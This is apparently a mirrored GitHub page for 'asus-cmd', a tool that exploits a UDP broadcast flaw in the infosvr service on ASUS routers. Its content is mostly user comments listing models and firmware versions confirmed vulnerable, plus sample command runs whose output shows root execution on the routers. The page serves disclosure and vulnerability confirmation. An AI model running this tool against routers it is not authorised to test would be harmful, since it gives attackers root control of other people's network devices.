jduck / asus-cmd Goto Github PK
View Code? Open in Web Editor NEWASUS Router infosvr UDP Broadcast root Command Execution
ASUS Router infosvr UDP Broadcast root Command Execution
extendno=6587-gaa506e9
firmver=3.0.0.4
The AC68U with stock firmware is vulnerable. Firmware version: 3.0.0.4.376_3626-g9a8323e
Input:
sudo ./asus-cmd "nvram show"
Output:
[*] sent command: nvram show
[!] received 512 bytes from 192.168.1.90:34285
0c 15 0033 5a6c89a6 41:41:41:41:41:41
000a nvram show
I have a direct ethernet connection to the router.
Firmware version 3.0.0.4.374_4422-gc83c78f
Latest firmware fix this: 3.0.0.4.376_3754-g5ef7c1f
It can't be downloaded authomatically, you must download it manually from Support Site here: http://www.asus.com/Networking/RTN66U/HelpDesk_Download/
I have confirmed the DSL-AC68U is vulnerable running firmware 3.0.0.4.376_2158-g340202b
Asus RT-N12E is vulnerable with firmware prior to version 2.0.0.37.
All RT-N12E models prior to RT-N12E B1 are end-of-life. As far as I'm aware, the only RT-N12E model prior to RT-N12E B1 was simply known as RT-N12E. This ancient device bares the marking "H/W Ver: A" - implying it's model A or A1, however this is not mentioned in the product name nor anywhere on the administrative web interface.
Off the shelf, the device is labelled with "F/W Ver: 1.1.0.13".
Tested on my RT-N12HP_B1 firmware version 3.0.0.4.374_1327
$ ./asus-cmd "echo \$USER"
[*] sent command: echo $USER
[!] received 512 bytes from 192.168.1.22:62134
0c 15 0033 54b4f46d 41:41:41:41:41:41
000a echo $USER
[!] received 512 bytes from 192.168.1.1:9999
0c 16 0033 54b4f46d e0:3f:49:91:54:b4
0005 root
[!] received 512 bytes from 192.168.1.1:9999
0c 16 0033 54b4f46d e0:3f:49:91:54:b4
0005 root
[!] received 512 bytes from 192.168.1.1:9999
0c 16 0033 54b4f46d e0:3f:49:91:54:b4
0005 root
Tested on firmware version 3.0.0.4.370.
ASUS RT-N16 running firmware 3.0.0.4.220 (not merlin) is vulnerable.
WL-330NUL seems not officially supported device. But it's codebase is Merlin and I could verify the vulnerability by starting infosvr "manually" from console and invoking asus-cmd exploit.
In case you'd like to add to the list of affected hardware, I've confirmed that the ASUS RT-N56U running firmware 3.0.0.4.374_5656 is vulnerable.
This issue also affects the ASUS WL-500g (from about 9 years ago). The format of the infosrvr protocol header is probably different. Here was some old code i had to exercise one of the innocuos OpCodes:
https://github.com/awalls-cx18/wl500g-infoclient/blob/master/infoclient.c#L55
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.